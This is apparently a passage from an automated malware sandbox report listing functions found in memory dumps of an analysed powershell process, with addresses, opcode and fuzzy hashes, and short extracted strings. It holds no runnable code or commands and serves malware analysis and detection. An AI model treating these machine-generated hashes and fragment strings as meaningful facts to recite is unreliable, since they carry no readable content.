                                                                            Function 02EF90E8 Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b884f238dffcb4e752ecf6161a421bec61364df442395baf1f7100a95cfd7a9f
                                                                            • Instruction ID: fd8166e806e97d1d32b6d7a4314b715cb0b435e76f636e1c0c2dd415000e402c
                                                                            • Opcode Fuzzy Hash: b884f238dffcb4e752ecf6161a421bec61364df442395baf1f7100a95cfd7a9f
                                                                            • Instruction Fuzzy Hash: ACF027756045048BD745AB69D00879BB7A6EFC0714F10C17EDE0A47389DE3A6C05CBE1
                                                                            Function 02EF767F Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 42be0a9909a26bf908dab5ead5844cf604c3a4d063c893e6cbb4303aaecd3342
                                                                            • Instruction ID: 8c168f890b2913a2bf75ebbded7d08643e186cb63f5fa75682d34363e27725ec
                                                                            • Opcode Fuzzy Hash: 42be0a9909a26bf908dab5ead5844cf604c3a4d063c893e6cbb4303aaecd3342
                                                                            • Instruction Fuzzy Hash: 18F0A0793001188FDB009BADA840AA9B7F2EFCD359B068164E609CB354DB30DC034B90
                                                                            Function 02EFAF88 Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2cdc8bc328e0cf3aeb1c9699627b7e5368edbf1df7a7acde5c5f8485edb85b24
                                                                            • Instruction ID: 5c685f4d1bd031725203f4317f162605afad4b1c0c7fdb4e7b8c42f13f46a826
                                                                            • Opcode Fuzzy Hash: 2cdc8bc328e0cf3aeb1c9699627b7e5368edbf1df7a7acde5c5f8485edb85b24
                                                                            • Instruction Fuzzy Hash: 91E0DF233687A5078B16822A3C100E6FF67DAC31B5349C2BBF648CF346EC06894283E1
                                                                            Function 02EFDE48 Relevance: .0, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6c66a3b8e1e36bbad8bbe99d78fd84cbf035774baccab67cda3872f1c43f32d
                                                                            • Instruction ID: dc24a7c5999b392bc8d6eb072d4e1ed3ff3adc59220cc0adaae47294f8692290
                                                                            • Opcode Fuzzy Hash: f6c66a3b8e1e36bbad8bbe99d78fd84cbf035774baccab67cda3872f1c43f32d
                                                                            • Instruction Fuzzy Hash: FFE01A757401108FC3109B1DD898C66BBFAEFCE76971950AAE649CB731DB61EC11CB90
                                                                            Function 02EF9549 Relevance: .0, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a44be44fc9f536d47941660c99d877f13ded98373e024417406d208a948e3535
                                                                            • Instruction ID: fc505ce720ae49f613fa44f26afe7b14c637f54f6deabf688d9ddf5a2b2d24ae
                                                                            • Opcode Fuzzy Hash: a44be44fc9f536d47941660c99d877f13ded98373e024417406d208a948e3535
                                                                            • Instruction Fuzzy Hash: 19E017227921291715E4A1BA29407FBE6CF8AC55AA785A236AB49C3242EE45DC0187F2
                                                                            Function 02EF9168 Relevance: .0, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e0fdfaadac57076bc531c6aa141369266af014d8513c86252a6163a1805d41c3
                                                                            • Instruction ID: 0c6ecd9b5237bd4de1a3a3eee05ca7ef5db866888a4e4a29ce7e3dd7c7a32a49
                                                                            • Opcode Fuzzy Hash: e0fdfaadac57076bc531c6aa141369266af014d8513c86252a6163a1805d41c3
                                                                            • Instruction Fuzzy Hash: 72F06D709013048BD3A49F78D89C39ABBE5FB44310F008469E24EC3340DB3968808B90
                                                                            Function 02EF8739 Relevance: .0, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0b0cd87c5dba4b7c703339713b408baaf899bfca32df1ad2ea8362aa31aa037c
                                                                            • Instruction ID: 95b249f325960a09b05074f1004eb6db4d10a2ef06ad09a1cf2cb771a7e6984a
                                                                            • Opcode Fuzzy Hash: 0b0cd87c5dba4b7c703339713b408baaf899bfca32df1ad2ea8362aa31aa037c
                                                                            • Instruction Fuzzy Hash: B8E04F3590551D8BCB08ABB4EC0A4FEFF30FB11312B4002AAEA8692590EA711986CBC1
                                                                            Function 02EF8978 Relevance: .0, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 23d701abcd6fcdf863aa44676533e74a195781fcf79e985eb2722b73f3601999
                                                                            • Instruction ID: 70206adf6fa0147cc790178b8ee01a0bfb8e7dc24f353456f12d14db3548ede3
                                                                            • Opcode Fuzzy Hash: 23d701abcd6fcdf863aa44676533e74a195781fcf79e985eb2722b73f3601999
                                                                            • Instruction Fuzzy Hash: D5E0263230421087CB0D3774E81C2AE7A57FBC4724F04802AE60A83344DFBD0C0287DA
                                                                            Function 02EF9550 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4f98046e0e8a4e94298b0a9e698cc1084f19785d1b7185e8a119148c439ef99d
                                                                            • Instruction ID: 8b24f32de6efb882c1999e0f9c5f884c21ad092bfbb90c3c278bed114c859dca
                                                                            • Opcode Fuzzy Hash: 4f98046e0e8a4e94298b0a9e698cc1084f19785d1b7185e8a119148c439ef99d
                                                                            • Instruction Fuzzy Hash: E1D05E127921251715D4A0BA19007BBA1CF8EC45A97459036AB09C3242EE44DC0187F2
                                                                            Function 02EF8800 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e80de984d100e10a939e7c1d708a2c63041b3b9b479630477f640901ef89cedb
                                                                            • Instruction ID: c5f6c5c63616924ea459e3388a381255baf5ed3e89c3b1b6a04d902dbcacd03c
                                                                            • Opcode Fuzzy Hash: e80de984d100e10a939e7c1d708a2c63041b3b9b479630477f640901ef89cedb
                                                                            • Instruction Fuzzy Hash: 44E04F36A1824A9BCB04DBA4E8465ADBFB4FB05215F008065EE8997351E6705D15CBC1
                                                                            Function 02EFDCE8 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                            • Instruction ID: 18fd6c23db1ad9a5ae26676c9b22ca5af573beeb88eeb0eca18b1861a8dfdfe3
                                                                            • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                            • Instruction Fuzzy Hash: AFE08631B1001497CB489959D8104EDFBAADBCD220F04C07ADA0AA7340DA325915C6E1
                                                                            Function 02EFDC98 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b8dab9a86509e9905d6db238bbb0728bc7ef0463446ae01da5a220c24414cf76
                                                                            • Instruction ID: 2ee6645d63874345bfff356a9162ce5fb18b1671046fdd32f94b589bd5101b85
                                                                            • Opcode Fuzzy Hash: b8dab9a86509e9905d6db238bbb0728bc7ef0463446ae01da5a220c24414cf76
                                                                            • Instruction Fuzzy Hash: CBE0C232780A140BC212A62EA81089F7BEBDFC5671350842EE24ACB340EF64EC0187D5
                                                                            Function 02EFF460 Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bf90e9b5954c0345de2b5d72ab18d8bf711d9fb3e688eab05498402b76685e0b
                                                                            • Instruction ID: 3f8580818ceb2f277aea029ec20a8e8ce7854bd994c55c4c35b485788727b180
                                                                            • Opcode Fuzzy Hash: bf90e9b5954c0345de2b5d72ab18d8bf711d9fb3e688eab05498402b76685e0b
                                                                            • Instruction Fuzzy Hash: 90E01A74D44249AFC780DFB898515AAFFF4AF49200B6085EED998DB611E7328A01CB91
                                                                            Function 02EFF470 Relevance: .0, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                            • Instruction ID: 402af82eafe0e89cf26dc336148881b846dec5b3b2cca7c9458c92faff2a5557
                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                            • Instruction Fuzzy Hash: B1D067B0D042099F8780EFADC9515AEFBF4EB48200F60C5AA8919E7341E7329A12CBD1
                                                                            Function 02EF8748 Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d061c9680e7e59de7fe33c3c8ba7d3e29adf6914230c7cc32c3d88eb3c2609cf
                                                                            • Instruction ID: 3868641f633f9e6dff9655d62b47f81e5e9470a7479d598f5c747e7cc75564f9
                                                                            • Opcode Fuzzy Hash: d061c9680e7e59de7fe33c3c8ba7d3e29adf6914230c7cc32c3d88eb3c2609cf
                                                                            • Instruction Fuzzy Hash: 19D067319051098BCB08EBA4E85B4BDBB74FB14301F404169EA4792190EA751A5ACAC5
                                                                            Function 02EF8810 Relevance: .0, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 70a3cdd57e4d03b4588f80609b5cb243839f787fce24653f7af83f67b51b1a28
                                                                            • Instruction ID: e124c0e2284302f72e55b17bfff3b64d726e51b76414b4e6820b9ead07585f35
                                                                            • Opcode Fuzzy Hash: 70a3cdd57e4d03b4588f80609b5cb243839f787fce24653f7af83f67b51b1a28
                                                                            • Instruction Fuzzy Hash: 8BD0123490820A8BC744DF64D44646DBBB4BB44201F008155ED4993350EA305D01CFC1
                                                                            Function 02EF791A Relevance: .0, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b97bfecdeed790f2f0b0b22f5795ace4172bd4d053a89ef434cae03f17dccc6
                                                                            • Instruction ID: 866a16655add70a40597074af405b4f457a1af744c8cb9617f99930ee29f9ea8
                                                                            • Opcode Fuzzy Hash: 1b97bfecdeed790f2f0b0b22f5795ace4172bd4d053a89ef434cae03f17dccc6
                                                                            • Instruction Fuzzy Hash: 54D0C931049385CFC34AAF78D66C8547F72EF8620678605CEE40A8B9BBC631A559DB11
                                                                            Function 02EF7E90 Relevance: .0, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8dafa9b89740576e405dec956e75bb8e09782d246c0fe21fb00d995e666d8d6b
                                                                            • Instruction ID: f94b267d4d532d76ac9b10494d68e29b29ddf06f26a011baf02ea542d303b4c6
                                                                            • Opcode Fuzzy Hash: 8dafa9b89740576e405dec956e75bb8e09782d246c0fe21fb00d995e666d8d6b
                                                                            • Instruction Fuzzy Hash: B2C08C304083804FEF06DB38CEB95283F71AE4720430B07C2C8038B036C9389810F741
                                                                            Function 02EF7928 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a862852076cc5030e165b4306e443dfc5d59eb2de2e23be4506dabf5689a5e28
                                                                            • Instruction ID: 6996c9ba5e78cd35e57afacbdff91de2adfaccb5c760b801f1b4baf2893d576c
                                                                            • Opcode Fuzzy Hash: a862852076cc5030e165b4306e443dfc5d59eb2de2e23be4506dabf5689a5e28
                                                                            • Instruction Fuzzy Hash: 73B092300457088FC2486F75A408918776AEB802167C004ADE80E0A2A68E36E884CA44

                                                                            Non-executed Functions

                                                                            Function 02EFEBB8 Relevance: 10.2, Strings: 8, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,gq$0oFp$$cq$$cq$$cq$$cq$$cq$$cq
                                                                            • API String ID: 0-3690240453
                                                                            • Opcode ID: ac47f2ede8ee7ff92582adc28ad52d8be4803c7e540119ce3fa3d78f9b1f8260
                                                                            • Instruction ID: 308f4b31e3bed758bcdf3031351699e9df5369ab32e54e24414fec55f7bafa12
                                                                            • Opcode Fuzzy Hash: ac47f2ede8ee7ff92582adc28ad52d8be4803c7e540119ce3fa3d78f9b1f8260
                                                                            • Instruction Fuzzy Hash: F541E9633844008FC76A9BB9885557D3A93BFCE74435A94AAD212CB7B3DF11EC40C352
                                                                            Function 07640488 Relevance: 9.2, Strings: 7, Instructions: 492COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fhq$4'cq$4'cq$4'cq$4'cq$r l$r l
                                                                            • API String ID: 0-2080564758
                                                                            • Opcode ID: 65fd6642249ac31f858876b086edc8e06a56fb369e7600b68a0d7b3122589d91
                                                                            • Instruction ID: c19d0a9188d438598f453353734893a1b4faf69bc0da271a6841bb307ed8313c
                                                                            • Opcode Fuzzy Hash: 65fd6642249ac31f858876b086edc8e06a56fb369e7600b68a0d7b3122589d91
                                                                            • Instruction Fuzzy Hash: 86F148B57042659FCB159B78D41066ABBA2EFC2210F14C0FBDA46CB752DB31DC86CBA1
                                                                            Function 02EFEDE8 Relevance: 9.2, Strings: 7, Instructions: 455COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0oFp$0oFp$0oFp$`Qcq$$cq$$cq$$cq
                                                                            • API String ID: 0-357146346
                                                                            • Opcode ID: 05d22ade9058ecbe81e6df4afc25ce8325e1c841e6961113fdf734ad1a2be49c
                                                                            • Instruction ID: af12d4d5526b1c8222c14fef112cebcbe0a4c226e45bd356dfa9824168ae3e76
                                                                            • Opcode Fuzzy Hash: 05d22ade9058ecbe81e6df4afc25ce8325e1c841e6961113fdf734ad1a2be49c
                                                                            • Instruction Fuzzy Hash: DDE134317501108FDBA59BB9841463E77D69FC8B18B29D4AADA06DB7E2EF30DC0183D2
                                                                            Function 07641EF8 Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$tPcq$tPcq$J!l$J!l$J!l
                                                                            • API String ID: 0-3786948392
                                                                            • Opcode ID: e16ffc40ecaa7574cc82fb856e74c070d56be44fa4c10d74ec5455bf043fa3d7
                                                                            • Instruction ID: deb2746ae3fc86dd7b0c28338e4ead1d8acaf9be7d0361dbf0b78472e1791491
                                                                            • Opcode Fuzzy Hash: e16ffc40ecaa7574cc82fb856e74c070d56be44fa4c10d74ec5455bf043fa3d7
                                                                            • Instruction Fuzzy Hash: 3B41EEB1B1420ACFCB159A698415667FBE2AFC6710F28C0B7D5168F356C731C882C761
                                                                            Function 02EF7A09 Relevance: 6.5, Strings: 5, Instructions: 241COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tM l$`dq$`dq$`dq$`dq
                                                                            • API String ID: 0-1864491702
                                                                            • Opcode ID: eeb4885a602523361f4b08290d1b0f2897d71d1ce25a35b93898ffa2aaeb79c9
                                                                            • Instruction ID: 3b4fa119cba704879e01249d96952f88cd11b01bc6f0fc183fcd7d03c188791b
                                                                            • Opcode Fuzzy Hash: eeb4885a602523361f4b08290d1b0f2897d71d1ce25a35b93898ffa2aaeb79c9
                                                                            • Instruction Fuzzy Hash: 11B1B6B4E016099FCB55DFA9D990A9DFBF2FF48300F109629E819AB315DB30A945CF90
                                                                            Function 02EF7A18 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tM l$`dq$`dq$`dq$`dq
                                                                            • API String ID: 0-1864491702
                                                                            • Opcode ID: 7cfbf2de8a4735795f765ddc48a9c2fb077f4ac948fafed53be397ff515ac759
                                                                            • Instruction ID: 6e3507eb2117181c1c2c4019029daf2ea0de7c1ccc7c9afa27f171264bd268a0
                                                                            • Opcode Fuzzy Hash: 7cfbf2de8a4735795f765ddc48a9c2fb077f4ac948fafed53be397ff515ac759
                                                                            • Instruction Fuzzy Hash: 59B1A774E016099FCB55DFA9D990A9DFBF2FF48300F509629E819AB305DB30A945CF90
                                                                            Function 02EF71F8 Relevance: 6.5, Strings: 5, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tM l$`dq$`dq$`dq$`dq
                                                                            • API String ID: 0-1864491702
                                                                            • Opcode ID: ae3d505e61a5089a0acf12ed84c4308931e5732356686afb0388d973ccd93f9e
                                                                            • Instruction ID: 355f43cd336767d3a8a49c5f986ae203a1b0ffebc6d964b6bf320efa441e54fe
                                                                            • Opcode Fuzzy Hash: ae3d505e61a5089a0acf12ed84c4308931e5732356686afb0388d973ccd93f9e
                                                                            • Instruction Fuzzy Hash: D1B1B5B4E006099FCB55DFA9D990A9DFBF2FF48300F109629E819AB305DB30A945CF90
                                                                            Function 07641BE0 Relevance: 6.5, Strings: 5, Instructions: 216COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$pij$r l$r l
                                                                            • API String ID: 0-1543505625
                                                                            • Opcode ID: f2cfea6734e58faf9c9c830484db95316806f77dacef6ecb341f486f8dfd315d
                                                                            • Instruction ID: c4a0e552c052ee80afff121a3f02e343af8091490f598dde3be957f94222bb1d
                                                                            • Opcode Fuzzy Hash: f2cfea6734e58faf9c9c830484db95316806f77dacef6ecb341f486f8dfd315d
                                                                            • Instruction Fuzzy Hash: B37105B5B0421ECFCB299B7994006AABBF2EFC6211F14847BD506CB355DB3589C1CB91
                                                                            Function 07643678 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$$cq$$cq$$cq
                                                                            • API String ID: 0-838516036
                                                                            • Opcode ID: d4950a28e3de7a8c0fb3eecf70b2466db9b48e85bedec7c69c038e0566c1ccbd
                                                                            • Instruction ID: e25ed82cdde32af47733b93bff907d0dd210da82eac05c8cb439d374157e6e76
                                                                            • Opcode Fuzzy Hash: d4950a28e3de7a8c0fb3eecf70b2466db9b48e85bedec7c69c038e0566c1ccbd
                                                                            • Instruction Fuzzy Hash: 345108F571420A9FDB255A7A8801766FBB6AFC2620F24807BD447EB392DB35C842C791
                                                                            Function 07643F28 Relevance: 5.4, Strings: 4, Instructions: 396COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'cq$4'cq$4'cq$4'cq
                                                                            • API String ID: 0-1446110543
                                                                            • Opcode ID: b75e01c6dd56e90edaf1688c9ddab2577d52a318d1a97cda46a3d14434fadb58
                                                                            • Instruction ID: 80d2891b0b872b6cdafe8dbe8d04569e42c843f61c7940964626216ddce00319
                                                                            • Opcode Fuzzy Hash: b75e01c6dd56e90edaf1688c9ddab2577d52a318d1a97cda46a3d14434fadb58
                                                                            • Instruction Fuzzy Hash: 3AD138B17042959FCB169B79880277ABFB2AFD2611F14807BD906CB391DF32D852C7A1
                                                                            Function 07645798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $cq$$cq$$cq$$cq
                                                                            • API String ID: 0-2876200767
                                                                            • Opcode ID: 09f08cb8dafc508078a1405ac28fa5940d1638ea64d1b578250b053343a554d0
                                                                            • Instruction ID: 9111e3dce35e9381f03bb8d0ab959999cd80b9c475ae3c026410881478c702b6
                                                                            • Opcode Fuzzy Hash: 09f08cb8dafc508078a1405ac28fa5940d1638ea64d1b578250b053343a554d0
                                                                            • Instruction Fuzzy Hash: A22168B271022A9FDB34597A9800727BB97ABD5711F24803EE90BCB383DD75C851C361
                                                                            Function 076422E8 Relevance: 5.1, Strings: 4, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
